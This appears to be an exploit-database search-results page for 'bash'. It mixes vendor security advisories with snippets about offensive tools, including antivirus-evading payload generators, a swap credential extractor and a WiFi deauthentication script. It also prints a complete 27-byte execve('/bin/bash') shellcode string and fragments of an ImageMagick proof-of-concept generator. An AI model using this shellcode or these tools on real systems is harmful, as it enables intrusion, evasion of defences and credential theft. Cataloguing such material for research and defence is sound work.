2649 matches found
ImageMagick - Memory Leak Exploit
Exploit for multiple platform in category local exploits !/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example...
ImageMagick - Memory Leak
ImageMagick - Memory Leak !/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example recovery: basename $0 recover...
ImageMagick - Memory Leak
!/bin/bash help echo "Usage poc generator: basename $0 gen WIDTHxHEIGHT NAME.xbm minimal" echo " Example gen: basename $0 gen 512x512 poc.xbm" echo "Usage result recovery: basename $0 recover SAVEDPREVIEW.png|jpeg|gif|etc" echo " Example recovery: basename $0 recover avatar.png" if "$1" == "-h" ;...
Armor - Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload. A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash...
SUSE SLED12 Security Update : libssh (SUSE-SU-2018:3253-1)
This update for libssh fixes the following issues : Security issue fixed : CVE-2018-10933: Fixed a server mode authentication bypass bsc1108020. Non security issue fixed: Fix popd syntax to be compatible with newer versions of the bash shell. Note that Tenable Network Security has extracted the...
SUSE SLES12 Security Update : bash (SUSE-SU-2018:1398-2)
This update for bash fixes the following issues : Security issues fixed : CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed bsc1001299 CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed bsc1000396 Non-security issues fixed: Fix repeating...
SUSE-SU-2018:3253-1 Security update for libssh
This update for libssh fixes the following issues: Security issue fixed: - CVE-2018-10933: Fixed a server mode authentication bypass bsc1108020. Non security issue fixed: - Fix popd syntax to be compatible with newer versions of the bash shell...
SUSE-SU-2018:1398-2 Security update for bash
This update for bash fixes the following issues: Security issues fixed: - CVE-2016-7543: A code execution possibility via SHELLOPTS+PS4 variable was fixed bsc1001299 - CVE-2016-0634: Arbitrary code execution via malicious hostname was fixed bsc1000396 Non-security issues fixed: - Fix repeating...
Swap Digger - Tool That Automates Swap Extraction And Searches For Linux User Credentials, Web Forms Credentials, Web Forms Emails, Http Basic Authentication, Wifi SSID And Keys, Etc
swapdigger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc. Download and run the tool O...
Qutebrowser CSRF Vulnerability
qutebrowser before version 1.4.1 is vulnerable to a cross-site request forgery flaw that allows websites to access qute:// URLs. A malicious website could exploit this to load a qute://settings/set URL, which then sets editor.command to a bash script, resulting in arbitrary code execution...
Linux/x64 - execve ("/bin/bash") Shellcode (27 bytes)
Author: Artr0n Linux/x64 - Execve/bin/bash Shellcode Shellcode Lenght: 27 include include int mainvoid char shellcode = "\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; printf"size: %d\n", strlenshellcode; void shellcode; return 0;...
openSUSE Security Update : libzypp / zypper (openSUSE-2018-1054)
This update for libzypp, zypper fixes the following issues : Update libzypp to version 16.17.20 : Security issues fixed : - PackageProvider: Validate delta rpms before caching bsc1091624, bsc1088705, CVE-2018-7685 - PackageProvider: Validate downloaded rpm package signatures before caching...
Network-Attacker - WiFi Stress Testing Beacon Flooding & Deauthentication Attack
network-attacker V0.1 is a Wifi Stress Testing Bash Script Program Based on Mdk3 Beacon Flooding & Deauthentication Attack Created To Help Beginners And even Professionals For a eacon Flooding Or Deauthentication Attack On Networks Installation sudo apt-get install git sudo git clone...
Staubli Jacquard Industrial System JC6 Shellshock Vulnerability
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability. Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment Variable Handling Code Injection Shellshock Exploit Author: t4rkd3vilz Vendor Homepage:...
Wildpwn - Unix Wildcard Attack Tool
Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often. First things first! Read: https://www.exploit-db.com/papers/33930/ Basic usage It goes something like...
Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild
It was only a matter of time before attacks were seen in the wild, and now it’s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and...
ASWCrypter - An Bash&Python Script For Generating Payloads that Bypasses All Antivirus
An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far FUD. PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM Important This Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ; Legal Disclamer: The author does...
Photon OS 1.0: Bash / Curl / Mariadb / Openvswitch / Systemd PHSA-2017-0044 (deprecated)
An update of openvswitch,systemd,curl,mariadb,bash packages for PhotonOS has been released. C Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0044. The text itself is...
Photon OS 2.0: Bash / Curl / Go / Libtiff / Systemd PHSA-2017-0045 (deprecated)
An update of go,curl,libtiff,systemd,bash packages for PhotonOS has been released. C Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0045. The text itself is copyright C...
Photon OS 1.0: Bash / Glibc / Libgcrypt / Libtar / Openjdk / Openjre / Strongswan / Unzip PHSA-2017-0040 (deprecated)
An update of openjdk,openjre,bash,libtar,glibc,libgcrypt,strongswan,unzip packages for PhotonOS has been released. C Tenable Network Security, Inc. @DEPRECATED@ Disabled on 2/7/2019 The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2017-0040...